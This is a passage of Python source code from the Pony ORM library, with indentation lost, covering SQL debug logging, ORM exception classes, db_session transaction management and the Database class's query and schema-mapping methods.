if not suppress_debug_change:
local.debug = value
def set_sql_debug(debug=True, show_values=None):
if not suppress_debug_change:
local.debug = debug
local.show_values = show_values
orm_logger = logging.getLogger('pony.orm')
sql_logger = logging.getLogger('pony.orm.sql')
orm_log_level = logging.INFO
def has_handlers(logger):
if not PY2:
return logger.hasHandlers()
while logger:
if logger.handlers:
return True
elif not logger.propagate:
return False
logger = logger.parent
return False
def log_orm(msg):
if has_handlers(orm_logger):
orm_logger.log(orm_log_level, msg)
else:
print(msg)
def log_sql(sql, arguments=None):
if type(arguments) is list:
sql = 'EXECUTEMANY (%d)\n%s' % (len(arguments), sql)
if has_handlers(sql_logger):
if local.show_values and arguments:
sql = '%s\n%s' % (sql, format_arguments(arguments))
sql_logger.log(orm_log_level, sql)
else:
if (local.show_values is None or local.show_values) and arguments:
sql = '%s\n%s' % (sql, format_arguments(arguments))
print(sql, end='\n\n')
def format_arguments(arguments):
if type(arguments) is not list: return args2str(arguments)
return '\n'.join(args2str(args) for args in arguments)
def args2str(args):
if isinstance(args, (tuple, list)):
return '[%s]' % ', '.join(imap(repr, args))
elif isinstance(args, dict):
return '{%s}' % ', '.join('%s:%s' % (repr(key), repr(val)) for key, val in sorted(iteritems(args)))
adapted_sql_cache = {}
string2ast_cache = {}
class OrmError(Exception): pass
class ERDiagramError(OrmError): pass
class DBSchemaError(OrmError): pass
class MappingError(OrmError): pass
class BindingError(OrmError): pass
class TableDoesNotExist(OrmError): pass
class TableIsNotEmpty(OrmError): pass
class ConstraintError(OrmError): pass
class CacheIndexError(OrmError): pass
class RowNotFound(OrmError): pass
class MultipleRowsFound(OrmError): pass
class TooManyRowsFound(OrmError): pass
class PermissionError(OrmError): pass
class ObjectNotFound(OrmError):
def __init__(exc, entity, pkval=None):
if pkval is not None:
if type(pkval) is tuple:
pkval = ','.join(imap(repr, pkval))
else: pkval = repr(pkval)
msg = '%s[%s]' % (entity.__name__, pkval)
else: msg = entity.__name__
OrmError.__init__(exc, msg)
exc.entity = entity
exc.pkval = pkval
class MultipleObjectsFoundError(OrmError): pass
class TooManyObjectsFoundError(OrmError): pass
class OperationWithDeletedObjectError(OrmError): pass
class TransactionError(OrmError): pass
class ConnectionClosedError(TransactionError): pass
class TransactionIntegrityError(TransactionError):
def __init__(exc, msg, original_exc=None):
Exception.__init__(exc, msg)
exc.original_exc = original_exc
class CommitException(TransactionError):
def __init__(exc, msg, exceptions):
Exception.__init__(exc, msg)
exc.exceptions = exceptions
class PartialCommitException(TransactionError):
def __init__(exc, msg, exceptions):
Exception.__init__(exc, msg)
exc.exceptions = exceptions
class RollbackException(TransactionError):
def __init__(exc, msg, exceptions):
Exception.__init__(exc, msg)
exc.exceptions = exceptions
class DatabaseSessionIsOver(TransactionError): pass
TransactionRolledBack = DatabaseSessionIsOver
class IsolationError(TransactionError): pass
class UnrepeatableReadError(IsolationError): pass
class OptimisticCheckError(IsolationError): pass
class UnresolvableCyclicDependency(TransactionError): pass
class UnexpectedError(TransactionError):
def __init__(exc, msg, original_exc):
Exception.__init__(exc, msg)
exc.original_exc = original_exc
class ExprEvalError(TranslationError):
def __init__(exc, src, cause):
assert isinstance(cause, Exception)
msg = '`%s` raises %s: %s' % (src, type(cause).__name__, str(cause))
TranslationError.__init__(exc, msg)
exc.cause = cause
class PonyInternalException(Exception):
pass
class OptimizationFailed(PonyInternalException):
pass # Internal exception, cannot be encountered in user code
class UseAnotherTranslator(PonyInternalException):
def __init__(self, translator):
Exception.__init__(self, 'This exception should be catched internally by PonyORM')
self.translator = translator
class DatabaseContainsIncorrectValue(RuntimeWarning):
pass
class DatabaseContainsIncorrectEmptyValue(DatabaseContainsIncorrectValue):
pass
def adapt_sql(sql, paramstyle):
result = adapted_sql_cache.get((sql, paramstyle))
if result is not None: return result
pos = 0
result = []
args = []
kwargs = {}
original_sql = sql
if paramstyle in ('format', 'pyformat'): sql = sql.replace('%', '%%')
while True:
try: i = sql.index('$', pos)
except ValueError:
result.append(sql[pos:])
break
result.append(sql[pos:i])
if sql[i+1] == '$':
result.append('$')
pos = i+2
else:
try: expr, _ = parse_expr(sql, i+1)
except ValueError:
raise # TODO
pos = i+1 + len(expr)
if expr.endswith(';'): expr = expr[:-1]
compile(expr, '<?>', 'eval') # expr correction check
if paramstyle == 'qmark':
args.append(expr)
result.append('?')
elif paramstyle == 'format':
args.append(expr)
result.append('%s')
elif paramstyle == 'numeric':
args.append(expr)
result.append(':%d' % len(args))
elif paramstyle == 'named':
key = 'p%d' % (len(kwargs) + 1)
kwargs[key] = expr
result.append(':' + key)
elif paramstyle == 'pyformat':
key = 'p%d' % (len(kwargs) + 1)
kwargs[key] = expr
result.append('%%(%s)s' % key)
else: throw(NotImplementedError)
if args or kwargs:
adapted_sql = ''.join(result)
if args: source = '(%s,)' % ', '.join(args)
else: source = '{%s}' % ','.join('%r:%s' % item for item in kwargs.items())
code = compile(source, '<?>', 'eval')
else:
adapted_sql = original_sql.replace('$$', '$')
code = compile('None', '<?>', 'eval')
result = adapted_sql, code
adapted_sql_cache[(sql, paramstyle)] = result
return result
class Local(localbase):
def __init__(local):
local.debug = False
local.show_values = None
local.debug_stack = []
local.db2cache = {}
local.db_context_counter = 0
local.db_session = None
local.current_user = None
local.perms_context = None
local.user_groups_cache = {}
local.user_roles_cache = defaultdict(dict)
def push_debug_state(local, debug, show_values):
local.debug_stack.append((local.debug, local.show_values))
if not suppress_debug_change:
local.debug = debug
local.show_values = show_values
def pop_debug_state(local):
local.debug, local.show_values = local.debug_stack.pop()
local = Local()
def _get_caches():
return list(sorted((cache for cache in local.db2cache.values()),
reverse=True, key=lambda cache : (cache.database.priority, cache.num)))
@cut_traceback
def flush():
for cache in _get_caches(): cache.flush()
def transact_reraise(exc_class, exceptions):
cls, exc, tb = exceptions[0]
new_exc = None
try:
msg = " ".join(tostring(arg) for arg in exc.args)
if not issubclass(cls, TransactionError): msg = '%s: %s' % (cls.__name__, msg)
new_exc = exc_class(msg, exceptions)
new_exc.__cause__ = None
reraise(exc_class, new_exc, tb)
finally: del exceptions, exc, tb, new_exc
def rollback_and_reraise(exc_info):
try:
rollback()
finally:
reraise(*exc_info)
@cut_traceback
def commit():
caches = _get_caches()
if not caches: return
try:
for cache in caches:
cache.flush()
except:
rollback_and_reraise(sys.exc_info())
primary_cache = caches[0]
other_caches = caches[1:]
exceptions = []
try:
primary_cache.commit()
except:
exceptions.append(sys.exc_info())
for cache in other_caches:
try: cache.rollback()
except: exceptions.append(sys.exc_info())
transact_reraise(CommitException, exceptions)
else:
for cache in other_caches:
try: cache.commit()
except: exceptions.append(sys.exc_info())
if exceptions:
transact_reraise(PartialCommitException, exceptions)
finally:
del exceptions
@cut_traceback
def rollback():
exceptions = []
try:
for cache in _get_caches():
try: cache.rollback()
except: exceptions.append(sys.exc_info())
if exceptions:
transact_reraise(RollbackException, exceptions)
assert not local.db2cache
finally:
del exceptions
select_re = re.compile(r'\s*select\b', re.IGNORECASE)
class DBSessionContextManager(object):
__slots__ = 'retry', 'retry_exceptions', 'allowed_exceptions', \
'immediate', 'ddl', 'serializable', 'strict', 'optimistic', \
'sql_debug', 'show_values'
def __init__(db_session, retry=0, immediate=False, ddl=False, serializable=False, strict=False, optimistic=True,
retry_exceptions=(TransactionError,), allowed_exceptions=(), sql_debug=None, show_values=None):
if retry is not 0:
if type(retry) is not int: throw(TypeError,
"'retry' parameter of db_session must be of integer type. Got: %s" % type(retry))
if retry < 0: throw(TypeError,
"'retry' parameter of db_session must not be negative. Got: %d" % retry)
if ddl: throw(TypeError, "'ddl' and 'retry' parameters of db_session cannot be used together")
if not callable(allowed_exceptions) and not callable(retry_exceptions):
for e in allowed_exceptions:
if e in retry_exceptions: throw(TypeError,
'The same exception %s cannot be specified in both '
'allowed and retry exception lists simultaneously' % e.__name__)
db_session.retry = retry
db_session.ddl = ddl
db_session.serializable = serializable
db_session.immediate = immediate or ddl or serializable or not optimistic
db_session.strict = strict
db_session.optimistic = optimistic and not serializable
db_session.retry_exceptions = retry_exceptions
db_session.allowed_exceptions = allowed_exceptions
db_session.sql_debug = sql_debug
db_session.show_values = show_values
def __call__(db_session, *args, **kwargs):
if not args and not kwargs: return db_session
if len(args) > 1: throw(TypeError,
'Pass only keyword arguments to db_session or use db_session as decorator')
if not args: return db_session.__class__(**kwargs)
if kwargs: throw(TypeError,
'Pass only keyword arguments to db_session or use db_session as decorator')
func = args[0]
if isgeneratorfunction(func) or hasattr(inspect, 'iscoroutinefunction') and inspect.iscoroutinefunction(func):
return db_session._wrap_coroutine_or_generator_function(func)
return db_session._wrap_function(func)
def __enter__(db_session):
if db_session.retry is not 0: throw(TypeError,
"@db_session can accept 'retry' parameter only when used as decorator and not as context manager")
db_session._enter()
def _enter(db_session):
if local.db_session is None:
assert not local.db_context_counter
local.db_session = db_session
elif db_session.ddl and not local.db_session.ddl: throw(TransactionError,
'Cannot start ddl transaction inside non-ddl transaction')
elif db_session.serializable and not local.db_session.serializable: throw(TransactionError,
'Cannot start serializable transaction inside non-serializable transaction')
local.db_context_counter += 1
if db_session.sql_debug is not None:
local.push_debug_state(db_session.sql_debug, db_session.show_values)
def __exit__(db_session, exc_type=None, exc=None, tb=None):
if db_session.sql_debug is not None:
local.pop_debug_state()
local.db_context_counter -= 1
if local.db_context_counter: return
assert local.db_session is db_session
try:
if exc_type is None: can_commit = True
elif not callable(db_session.allowed_exceptions):
can_commit = issubclass(exc_type, tuple(db_session.allowed_exceptions))
else:
assert exc is not None # exc can be None in Python 2.6 even if exc_type is not None
try: can_commit = db_session.allowed_exceptions(exc)
except: rollback_and_reraise(sys.exc_info())
if can_commit:
commit()
for cache in _get_caches(): cache.release()
assert not local.db2cache
else:
try: rollback()
except:
if exc_type is None: raise # if exc_type is not None it will be reraised outside of __exit__
finally:
del exc, tb
local.db_session = None
local.user_groups_cache.clear()
local.user_roles_cache.clear()
def _wrap_function(db_session, func):
def new_func(func, *args, **kwargs):
if db_session.ddl and local.db_context_counter:
if isinstance(func, types.FunctionType): func = func.__name__ + '()'
throw(TransactionError, '%s cannot be called inside of db_session' % func)
if db_session.sql_debug is not None:
local.push_debug_state(db_session.sql_debug, db_session.show_values)
exc = tb = None
try:
for i in xrange(db_session.retry+1):
db_session._enter()
exc_type = exc = tb = None
try:
result = func(*args, **kwargs)
commit()
return result
except:
exc_type, exc, tb = sys.exc_info()
retry_exceptions = db_session.retry_exceptions
if not callable(retry_exceptions):
do_retry = issubclass(exc_type, tuple(retry_exceptions))
else:
assert exc is not None # exc can be None in Python 2.6
do_retry = retry_exceptions(exc)
if not do_retry: raise
finally: db_session.__exit__(exc_type, exc, tb)
reraise(exc_type, exc, tb)
finally:
del exc, tb
if db_session.sql_debug is not None:
local.pop_debug_state()
return decorator(new_func, func)
def _wrap_coroutine_or_generator_function(db_session, gen_func):
for option in ('ddl', 'retry', 'serializable'):
if getattr(db_session, option, None): throw(TypeError,
"db_session with `%s` option cannot be applied to generator function" % option)
def interact(iterator, input=None, exc_info=None):
if exc_info is None:
return next(iterator) if input is None else iterator.send(input)
if exc_info[0] is GeneratorExit:
close = getattr(iterator, 'close', None)
if close is not None: close()
reraise(*exc_info)
throw_ = getattr(iterator, 'throw', None)
if throw_ is None: reraise(*exc_info)
return throw_(*exc_info)
@wraps(gen_func)
def new_gen_func(*args, **kwargs):
db2cache_copy = {}
def wrapped_interact(iterator, input=None, exc_info=None):
if local.db_session is not None: throw(TransactionError,
'@db_session-wrapped generator cannot be used inside another db_session')
assert not local.db_context_counter and not local.db2cache
local.db_context_counter = 1
local.db_session = db_session
local.db2cache.update(db2cache_copy)
db2cache_copy.clear()
if db_session.sql_debug is not None:
local.push_debug_state(db_session.sql_debug, db_session.show_values)
try:
try:
output = interact(iterator, input, exc_info)
except StopIteration as e:
for cache in _get_caches():
if cache.modified or cache.in_transaction: throw(TransactionError,
'You need to manually commit() changes before exiting from the generator')
raise
for cache in _get_caches():
if cache.modified or cache.in_transaction: throw(TransactionError,
'You need to manually commit() changes before yielding from the generator')
except:
rollback_and_reraise(sys.exc_info())
else:
return output
finally:
if db_session.sql_debug is not None:
local.pop_debug_state()
db2cache_copy.update(local.db2cache)
local.db2cache.clear()
local.db_context_counter = 0
local.db_session = None
gen = gen_func(*args, **kwargs)
iterator = gen.__await__() if hasattr(gen, '__await__') else iter(gen)
output = wrapped_interact(iterator)
try:
while True:
try:
input = yield output
except:
output = wrapped_interact(iterator, exc_info=sys.exc_info())
else:
output = wrapped_interact(iterator, input)
except StopIteration:
return
if hasattr(types, 'coroutine'):
new_gen_func = types.coroutine(new_gen_func)
return new_gen_func
db_session = DBSessionContextManager()
class SQLDebuggingContextManager(object):
def __init__(self, debug=True, show_values=None):
self.debug = debug
self.show_values = show_values
def __call__(self, *args, **kwargs):
if not kwargs and len(args) == 1 and callable(args[0]):
arg = args[0]
if not isgeneratorfunction(arg):
return self._wrap_function(arg)
return self._wrap_generator_function(arg)
return self.__class__(*args, **kwargs)
def __enter__(self):
local.push_debug_state(self.debug, self.show_values)
def __exit__(self, exc_type=None, exc=None, tb=None):
local.pop_debug_state()
def _wrap_function(self, func):
def new_func(func, *args, **kwargs):
self.__enter__()
try:
return func(*args, **kwargs)
finally:
self.__exit__()
return decorator(new_func, func)
def _wrap_generator_function(self, gen_func):
def interact(iterator, input=None, exc_info=None):
if exc_info is None:
return next(iterator) if input is None else iterator.send(input)
if exc_info[0] is GeneratorExit:
close = getattr(iterator, 'close', None)
if close is not None: close()
reraise(*exc_info)
throw_ = getattr(iterator, 'throw', None)
if throw_ is None: reraise(*exc_info)
return throw_(*exc_info)
def new_gen_func(gen_func, *args, **kwargs):
def wrapped_interact(iterator, input=None, exc_info=None):
self.__enter__()
try:
return interact(iterator, input, exc_info)
finally:
self.__exit__()
gen = gen_func(*args, **kwargs)
iterator = iter(gen)
output = wrapped_interact(iterator)
try:
while True:
try:
input = yield output
except:
output = wrapped_interact(iterator, exc_info=sys.exc_info())
else:
output = wrapped_interact(iterator, input)
except StopIteration:
return
return decorator(new_gen_func, gen_func)
sql_debugging = SQLDebuggingContextManager()
def throw_db_session_is_over(action, obj, attr=None):
msg = 'Cannot %s %s%s: the database session is over'
throw(DatabaseSessionIsOver, msg % (action, safe_repr(obj), '.%s' % attr.name if attr else ''))
def with_transaction(*args, **kwargs):
deprecated(3, "@with_transaction decorator is deprecated, use @db_session decorator instead")
return db_session(*args, **kwargs)
@decorator
def db_decorator(func, *args, **kwargs):
web = sys.modules.get('pony.web')
allowed_exceptions = [ web.HttpRedirect ] if web else []
try:
with db_session(allowed_exceptions=allowed_exceptions):
return func(*args, **kwargs)
except (ObjectNotFound, RowNotFound):
if web: throw(web.Http404NotFound)
raise
known_providers = ('sqlite', 'postgres', 'mysql', 'oracle')
class OnConnectDecorator(object):
@staticmethod
def check_provider(provider):
if provider:
if not isinstance(provider, basestring):
throw(TypeError, "'provider' option should be type of 'string', got %r" % type(provider).__name__)
if provider not in known_providers:
throw(BindingError, 'Unknown provider %s' % provider)
def __init__(self, database, provider):
OnConnectDecorator.check_provider(provider)
self.provider = provider
self.database = database
def __call__(self, func=None, provider=None):
if isinstance(func, types.FunctionType):
self.database._on_connect_funcs.append((func, provider or self.provider))
if not provider and func is basestring:
provider = func
OnConnectDecorator.check_provider(provider)
return OnConnectDecorator(self.database, provider)
class Database(object):
def __deepcopy__(self, memo):
return self # Database cannot be cloned by deepcopy()
@cut_traceback
def __init__(self, *args, **kwargs):
# argument 'self' cannot be named 'database', because 'database' can be in kwargs
self.priority = 0
self._insert_cache = {}
# ER-diagram related stuff:
self._translator_cache = {}
self._constructed_sql_cache = {}
self.entities = {}
self.schema = None
self.Entity = type.__new__(EntityMeta, 'Entity', (Entity,), {})
self.Entity._database_ = self
# Statistics-related stuff:
self._global_stats = {}
self._global_stats_lock = RLock()
self._dblocal = DbLocal()
self.on_connect = OnConnectDecorator(self, None)
self._on_connect_funcs = []
self.provider = self.provider_name = None
if args or kwargs: self._bind(*args, **kwargs)
def call_on_connect(database, con):
for func, provider in database._on_connect_funcs:
if not provider or provider == database.provider_name:
func(database, con)
con.commit()
@cut_traceback
def bind(self, *args, **kwargs):
self._bind(*args, **kwargs)
def _bind(self, *args, **kwargs):
# argument 'self' cannot be named 'database', because 'database' can be in kwargs
if self.provider is not None:
throw(BindingError, 'Database object was already bound to %s provider' % self.provider.dialect)
if args: provider, args = args[0], args[1:]
elif 'provider' not in kwargs: throw(TypeError, 'Database provider is not specified')
else: provider = kwargs.pop('provider')
if isinstance(provider, type) and issubclass(provider, DBAPIProvider):
provider_cls = provider
else:
if not isinstance(provider, basestring): throw(TypeError)
if provider == 'pygresql': throw(TypeError,
'Pony no longer supports PyGreSQL module. Please use psycopg2 instead.')
self.provider_name = provider
provider_module = import_module('pony.orm.dbproviders.' + provider)
provider_cls = provider_module.provider_cls
kwargs['pony_call_on_connect'] = self.call_on_connect
self.provider = provider_cls(*args, **kwargs)
@property
def last_sql(database):
return database._dblocal.last_sql
@property
def local_stats(database):
return database._dblocal.stats
def _update_local_stat(database, sql, query_start_time):
dblocal = database._dblocal
dblocal.last_sql = sql
stats = dblocal.stats
stat = stats.get(sql)
if stat is not None: stat.query_executed(query_start_time)
else: stats[sql] = QueryStat(sql, query_start_time)
def merge_local_stats(database):
setdefault = database._global_stats.setdefault
with database._global_stats_lock:
for sql, stat in iteritems(database._dblocal.stats):
global_stat = setdefault(sql, stat)
if global_stat is not stat: global_stat.merge(stat)
database._dblocal.stats.clear()
@property
def global_stats(database):
with database._global_stats_lock:
return {sql: stat.copy() for sql, stat in iteritems(database._global_stats)}
@property
def global_stats_lock(database):
deprecated(3, "global_stats_lock is deprecated, just use global_stats property without any locking")
return database._global_stats_lock
@cut_traceback
def get_connection(database):
cache = database._get_cache()
if not cache.in_transaction:
cache.immediate = True
cache.prepare_connection_for_query_execution()
cache.in_transaction = True
connection = cache.connection
assert connection is not None
return connection
@cut_traceback
def disconnect(database):
provider = database.provider
if provider is None: return
if local.db_context_counter: throw(TransactionError, 'disconnect() cannot be called inside of db_sesison')
cache = local.db2cache.get(database)
if cache is not None: cache.rollback()
provider.disconnect()
def _get_cache(database):
if database.provider is None: throw(MappingError, 'Database object is not bound with a provider yet')
cache = local.db2cache.get(database)
if cache is not None: return cache
if not local.db_context_counter and not (
pony.MODE == 'INTERACTIVE' and current_thread().__class__ is _MainThread
): throw(TransactionError, 'db_session is required when working with the database')
cache = local.db2cache[database] = SessionCache(database)
return cache
@cut_traceback
def flush(database):
database._get_cache().flush()
@cut_traceback
def commit(database):
cache = local.db2cache.get(database)
if cache is not None:
cache.flush_and_commit()
@cut_traceback
def rollback(database):
cache = local.db2cache.get(database)
if cache is not None:
try: cache.rollback()
except: transact_reraise(RollbackException, [sys.exc_info()])
@cut_traceback
def execute(database, sql, globals=None, locals=None):
return database._exec_raw_sql(sql, globals, locals, frame_depth=cut_traceback_depth+1, start_transaction=True)
def _exec_raw_sql(database, sql, globals, locals, frame_depth, start_transaction=False):
provider = database.provider
if provider is None: throw(MappingError, 'Database object is not bound with a provider yet')
sql = sql[:] # sql = templating.plainstr(sql)
if globals is None:
assert locals is None
frame_depth += 1
globals = sys._getframe(frame_depth).f_globals
locals = sys._getframe(frame_depth).f_locals
adapted_sql, code = adapt_sql(sql, provider.paramstyle)
arguments = eval(code, globals, locals)
return database._exec_sql(adapted_sql, arguments, False, start_transaction)
@cut_traceback
def select(database, sql, globals=None, locals=None, frame_depth=0):
if not select_re.match(sql): sql = 'select ' + sql
cursor = database._exec_raw_sql(sql, globals, locals, frame_depth+cut_traceback_depth+1)
max_fetch_count = options.MAX_FETCH_COUNT
if max_fetch_count is not None:
result = cursor.fetchmany(max_fetch_count)
if cursor.fetchone() is not None: throw(TooManyRowsFound)
else: result = cursor.fetchall()
if len(cursor.description) == 1: return [ row[0] for row in result ]
row_class = type("row", (tuple,), {})
for i, column_info in enumerate(cursor.description):
column_name = column_info[0]
if not is_ident(column_name): continue
if hasattr(tuple, column_name) and column_name.startswith('__'): continue
setattr(row_class, column_name, property(itemgetter(i)))
return [ row_class(row) for row in result ]
@cut_traceback
def get(database, sql, globals=None, locals=None):
rows = database.select(sql, globals, locals, frame_depth=cut_traceback_depth+1)
if not rows: throw(RowNotFound)
if len(rows) > 1: throw(MultipleRowsFound)
row = rows[0]
return row
@cut_traceback
def exists(database, sql, globals=None, locals=None):
if not select_re.match(sql): sql = 'select ' + sql
cursor = database._exec_raw_sql(sql, globals, locals, frame_depth=cut_traceback_depth+1)
result = cursor.fetchone()
return bool(result)
@cut_traceback
def insert(database, table_name, returning=None, **kwargs):
table_name = database._get_table_name(table_name)
if database.provider is None: throw(MappingError, 'Database object is not bound with a provider yet')
query_key = (table_name,) + tuple(kwargs) # keys are not sorted deliberately!!
if returning is not None: query_key = query_key + (returning,)
cached_sql = database._insert_cache.get(query_key)
if cached_sql is None:
ast = [ 'INSERT', table_name, kwargs.keys(),
[ [ 'PARAM', (i, None, None) ] for i in xrange(len(kwargs)) ], returning ]
sql, adapter = database._ast2sql(ast)
cached_sql = sql, adapter
database._insert_cache[query_key] = cached_sql
else: sql, adapter = cached_sql
arguments = adapter(values_list(kwargs)) # order of values same as order of keys
if returning is not None:
return database._exec_sql(sql, arguments, returning_id=True, start_transaction=True)
cursor = database._exec_sql(sql, arguments, start_transaction=True)
return getattr(cursor, 'lastrowid', None)
def _ast2sql(database, sql_ast):
sql, adapter = database.provider.ast2sql(sql_ast)
return sql, adapter
def _exec_sql(database, sql, arguments=None, returning_id=False, start_transaction=False):
cache = database._get_cache()
if start_transaction: cache.immediate = True
connection = cache.prepare_connection_for_query_execution()
cursor = connection.cursor()
if local.debug: log_sql(sql, arguments)
provider = database.provider
t = time()
try: new_id = provider.execute(cursor, sql, arguments, returning_id)
except Exception as e:
connection = cache.reconnect(e)
cursor = connection.cursor()
if local.debug: log_sql(sql, arguments)
t = time()
new_id = provider.execute(cursor, sql, arguments, returning_id)
if cache.immediate: cache.in_transaction = True
database._update_local_stat(sql, t)
if not returning_id: return cursor
if PY2 and type(new_id) is long: new_id = int(new_id)
return new_id
@cut_traceback
def generate_mapping(database, filename=None, check_tables=True, create_tables=False):
provider = database.provider
if provider is None: throw(MappingError, 'Database object is not bound with a provider yet')
if database.schema: throw(BindingError, 'Mapping was already generated')
if filename is not None: throw(NotImplementedError)
schema = database.schema = provider.dbschema_cls(provider)
entities = list(sorted(database.entities.values(), key=attrgetter('_id_')))
for entity in entities:
entity._resolve_attr_types_()
for entity in entities:
entity._link_reverse_attrs_()
for entity in entities:
entity._check_table_options_()
def get_columns(table, column_names):
column_dict = table.column_dict
return tuple(column_dict[name] for name in column_names)
for entity in entities:
entity._get_pk_columns_()
table_name = entity._table_
is_subclass = entity._root_ is not entity
if is_subclass:
if table_name is not None: throw(NotImplementedError)
table_name = entity._root_._table_
entity._table_ = table_name
elif table_name is None:
table_name = provider.get_default_entity_table_name(entity)
entity._table_ = table_name
else: assert isinstance(table_name, (basestring, tuple))
table = schema.tables.get(table_name)
if table is None: table = schema.add_table(table_name, entity)
else: table.add_entity(entity)
for attr in entity._new_attrs_:
if attr.is_collection:
if not isinstance(attr, Set): throw(NotImplementedError)
reverse = attr.reverse
if not reverse.is_collection: # many-to-one:
if attr.table is not None: throw(MappingError,
"Parameter 'table' is not allowed for many-to-one attribute %s" % attr)
elif attr.columns: throw(NotImplementedError,
"Parameter 'column' is not allowed for many-to-one attribute %s" % attr)
continue
# many-to-many:
if not isinstance(reverse, Set): throw(NotImplementedError)
if attr.entity.__name__ > reverse.entity.__name__: continue
if attr.entity is reverse.entity and attr.name > reverse.name: continue
if attr.table:
if not reverse.table: reverse.table = attr.table
elif reverse.table != attr.table:
throw(MappingError, "Parameter 'table' for %s and %s do not match" % (attr, reverse))
table_name = attr.table
elif reverse.table: table_name = attr.table = reverse.table
else:
table_name = provider.get_default_m2m_table_name(attr, reverse)
m2m_table = schema.tables.get(table_name)
if m2m_table is not None:
if not attr.table:
seq_counter = itertools.count(2)
while m2m_table is not None:
if isinstance(table_name, basestring):
new_table_name = table_name + '_%d' % next(seq_counter)
else:
schema_name, base_name = provider.split_table_name(table_name)
new_table_name = schema_name, base_name + '_%d' % next(seq_counter)
m2m_table = schema.tables.get(new_table_name)
table_name = new_table_name
elif m2m_table.entities or m2m_table.m2m: throw(MappingError,
"Table name %s is already in use" % provider.format_table_name(table_name))
else: throw(NotImplementedError)
attr.table = reverse.table = table_name
m2m_table = schema.add_table(table_name)
m2m_columns_1 = attr.get_m2m_columns(is_reverse=False)
m2m_columns_2 = reverse.get_m2m_columns(is_reverse=True)
if m2m_columns_1 == m2m_columns_2: throw(MappingError,
'Different column names should be specified for attributes %s and %s' % (attr, reverse))
assert len(m2m_columns_1) == len(reverse.converters)
assert len(m2m_columns_2) == len(attr.converters)
for column_name, converter in izip(m2m_columns_1 + m2m_columns_2, reverse.converters + attr.converters):
m2m_table.add_column(column_name, converter.get_sql_type(), converter, True)
m2m_table.add_index(None, tuple(m2m_table.column_list), is_pk=True)
m2m_table.m2m.add(attr)
m2m_table.m2m.add(reverse)
else:
if attr.is_required: pass
elif not attr.is_string:
if attr.nullable is False:
throw(TypeError, 'Optional attribute with non-string type %s must be nullable' % attr)
attr.nullable = True
elif entity._database_.provider.dialect == 'Oracle':
if attr.nullable is False: throw(ERDiagramError,
'In Oracle, optional string attribute %s must be nullable' % attr)
attr.nullable = True
columns = attr.get_columns() # initializes attr.converters
if not attr.reverse and attr.default is not None:
assert len(attr.converters) == 1
if not callable(attr.default): attr.default = attr.validate(attr.default)
assert len(columns) == len(attr.converters)
if len(columns) == 1:
converter = attr.converters[0]
table.add_column(columns[0], converter.get_sql_type(attr),
converter, not attr.nullable, attr.sql_default)
elif columns:
if attr.sql_type is not None: throw(NotImplementedError,
'sql_type cannot be specified for composite attribute %s' % attr)
for (column_name, converter) in izip(columns, attr.converters):
table.add_column(column_name, converter.get_sql_type(), converter, not attr.nullable)
else: pass # virtual attribute of one-to-one pair
entity._attrs_with_columns_ = [ attr for attr in entity._attrs_
if not attr.is_collection and attr.columns ]
if not table.pk_index:
if len(entity._pk_columns_) == 1 and entity._pk_attrs_[0].auto: is_pk = "auto"
else: is_pk = True
table.add_index(None, get_columns(table, entity._pk_columns_), is_pk)
for index in entity._indexes_:
if index.is_pk: continue
column_names = []
attrs = index.attrs
for attr in attrs: column_names.extend(attr.columns)
index_name = attrs[0].index if len(attrs) == 1 else None
table.add_index(index_name, get_columns(table, column_names), is_unique=index.is_unique)
columns = []
columns_without_pk = []
converters = []
converters_without_pk = []
for attr in entity._attrs_with_columns_:
columns.extend(attr.columns) # todo: inheritance
converters.extend(attr.converters)
if not attr.is_pk:
columns_without_pk.extend(attr.columns)
converters_without_pk.extend(attr.converters)
entity._columns_ = columns
entity._columns_without_pk_ = columns_without_pk
entity._converters_ = converters
entity._converters_without_pk_ = converters_without_pk
for entity in entities:
table = schema.tables[entity._table_]
for attr in entity._new_attrs_:
if attr.is_collection:
reverse = attr.reverse
if not reverse.is_collection: continue
if not isinstance(attr, Set): throw(NotImplementedError)
if not isinstance(reverse, Set): throw(NotImplementedError)
m2m_table = schema.tables[attr.table]
parent_columns = get_columns(table, entity._pk_columns_)
child_columns = get_columns(m2m_table, reverse.columns)
m2m_table.add_foreign_key(reverse.fk_name, child_columns, table, parent_columns, attr.index)
if attr.symmetric:
child_columns = get_columns(m2m_table, attr.reverse_columns)
m2m_table.add_foreign_key(attr.reverse_fk_name, child_columns, table, parent_columns)
elif attr.reverse and attr.columns:
rentity = attr.reverse.entity
parent_table = schema.tables[rentity._table_]
parent_columns = get_columns(parent_table, rentity._pk_columns_)
child_columns = get_columns(table, attr.columns)
table.add_foreign_key(attr.reverse.fk_name, child_columns, parent_table, parent_columns, attr.index)
elif attr.index and attr.columns:
columns = tuple(imap(table.column_dict.__getitem__, attr.columns))
table.add_index(attr.index, columns, is_unique=attr.is_unique)
entity._initialize_bits_()
if create_tables: database.create_tables(check_tables)
elif check_tables: database.check_tables()
@cut_traceback
@db_session(ddl=True)
def drop_table(database, table_name, if_exists=False, with_all_data=False):
database._drop_tables([ table_name ], if_exists, with_all_data, try_normalized=True)
def _get_table_name(database, table_name):
if isinstance(table_name, EntityMeta):
entity = table_name
table_name = entity._table_
elif isinstance(table_name, Set):
attr = table_name
table_name = attr.table if attr.reverse.is_collection else attr.entity._table_
elif isinstance(table_name, Attribute): throw(TypeError,
"Attribute %s is not Set and doesn't have corresponding table" % table_name)
elif table_name is None:
if database.schema is None: throw(MappingError, 'No mapping was generated for the database')
else: throw(TypeError, 'Table name cannot be None')
elif isinstance(table_name, tuple):
for component in table_name:
if not isinstance(component, basestring):
throw(TypeError, 'Invalid table name component: {}'.format(component))
elif isinstance(table_name, basestring):
table_name = table_name[:] # table_name = templating.plainstr(table_name)
else: throw(TypeError, 'Invalid table name: {}'.format(table_name))
return table_name
@cut_traceback
@db_session(ddl=True)
def drop_all_tables(database, with_all_data=False):
if database.schema is None: throw(ERDiagramError, 'No mapping was generated for the database')
database._drop_tables(database.schema.tables, True, with_all_data)
def _drop_tables(database, table_names, if_exists, with_all_data, try_normalized=False):
cache = database._get_cache()
connection = cache.prepare_connection_for_query_execution()
provider = database.provider
existed_tables = []
for table_name in table_names:
table_name = database._get_table_name(table_name)
if provider.table_exists(connection, table_name): existed_tables.append(table_name)
elif not if_exists:
if try_normalized:
if isinstance(table_name, basestring):
normalized_table_name = provider.normalize_name(table_name)
else:
schema_name, base_name = provider.split_table_name(table_name)
normalized_table_name = schema_name, provider.normalize_name(base_name)
if normalized_table_name != table_name and provider.table_exists(connection, normalized_table_name):
